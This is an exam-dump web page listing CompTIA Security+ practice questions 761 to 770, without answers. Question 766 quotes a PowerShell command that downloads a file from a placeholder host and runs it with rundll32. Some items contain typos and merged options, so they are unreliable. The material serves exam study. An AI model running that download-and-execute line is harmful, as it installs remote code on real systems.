SY0-601 Exam Details

  • Exam Code
    :SY0-601
  • Exam Name
    :CompTIA Security+
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :1334 Q&As
  • Last Updated
    :May 26, 2026

CompTIA SY0-601 Online Questions & Answers

  • Question 761:

    A systems administrator needs to implement an access control scheme that will allow an object's access policy to be determined by its owner. Which of the following access control schemes BEST fits the requirements?

    A. Role-based access control
    B. Discretionary access control
    C. Mandatory access control
    D. Attribute-based access control

  • Question 762:

    A large industrial system's smart generator monitors the system status and sends alerts to third-party maintenance personnel when critical failures occur. While reviewing the network logs the company's security manager notices the generator's IP is sending packets to an internal file server's IP.

    Which of the following mitigations would be BEST for the security manager to implement while maintaining alerting capabilities?

    A. Segmentation
    B. Firewall whitelisting
    C. Containment D. isolation

  • Question 763:

    A security analyst is reviewing packet capture data from a compromised host on the network. In the packet capture, the analyst locates packets that contain large amounts of text. Which of the following is most likely installed on the compromised host?

    A. Keylogger
    B. Spyware
    C. Trojan
    D. Ransomware

  • Question 764:

    Which of the following is a reason why an organization would define an AUP?

    A. To define the lowest level of privileges needed for access and use of the organization's resources
    B. To define the set of rules and behaviors for users of the organization's IT systems
    C. To define the intended partnership between two organizations
    D. To define the availability and reliability characteristics between an IT provider and consumer

  • Question 765:

    A hosting provider needs to prove that its security controls have been in place over the last six months and have sufficiently protected customer data. Which of the following would provide the best proof that the hosting provider has met the requirements?

    A. NIST CSF
    B. SOC 2 Type 2 report
    C. CIS Top 20 compliance reports
    D. Vulnerability report

  • Question 766:

    An employee received an email with an unusual file attachment named Updates . Lnk. A security analysts reverse engineering what the fle does and finds that executes the folowing script:

    C:\Windows \System32\WindowsPowerShell\vl.0\powershell.exe -URI https://somehost.com/04EB18.jpg - OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll

    Which of the following BEST describes what the analyst found?

    A. A Powershell code is performing a DLL injection.
    B. A PowerShell code is displaying a picture.
    C. A PowerShell code is configuring environmental variables.
    D. A PowerShell code is changing Windows Update settings.

  • Question 767:

    A news article states that a popular web browser deployed on all corporate PCs is vulnerable to a zero-day attack. Which of the following MOST concerns the Chief Information Security Officer about the information in the news article?

    A. Insider threats have compromised this network.
    B. Web browsing is not functional for the entire network.
    C. Antivirus signatures are required to be updated immediately.
    D. No patches are available for the web browser.

  • Question 768:

    Which of the following BEST describes the MFA attribute that requires a callback on a predefined landline?

    A. Something you exhibit
    B. Something you can do
    C. Someone you know
    D. Somewhere you are

  • Question 769:

    An administrator assists the legal and compliance team with ensuring information about customer transactions is archived for the proper time period. Which of the following data policies is the administrator carrying out?

    A. Compromise
    B. Retention
    C. Analysis
    D. Transfer
    E. Inventory

  • Question 770:

    A company is implementing BYOD and wants to ensure all users have access to the same cloud-based services. Which of the following would BEST allow the company to meet this requirement?

    A. laaS
    B. PasS
    C. MaaS
    D. SaaS

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your SY0-601 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.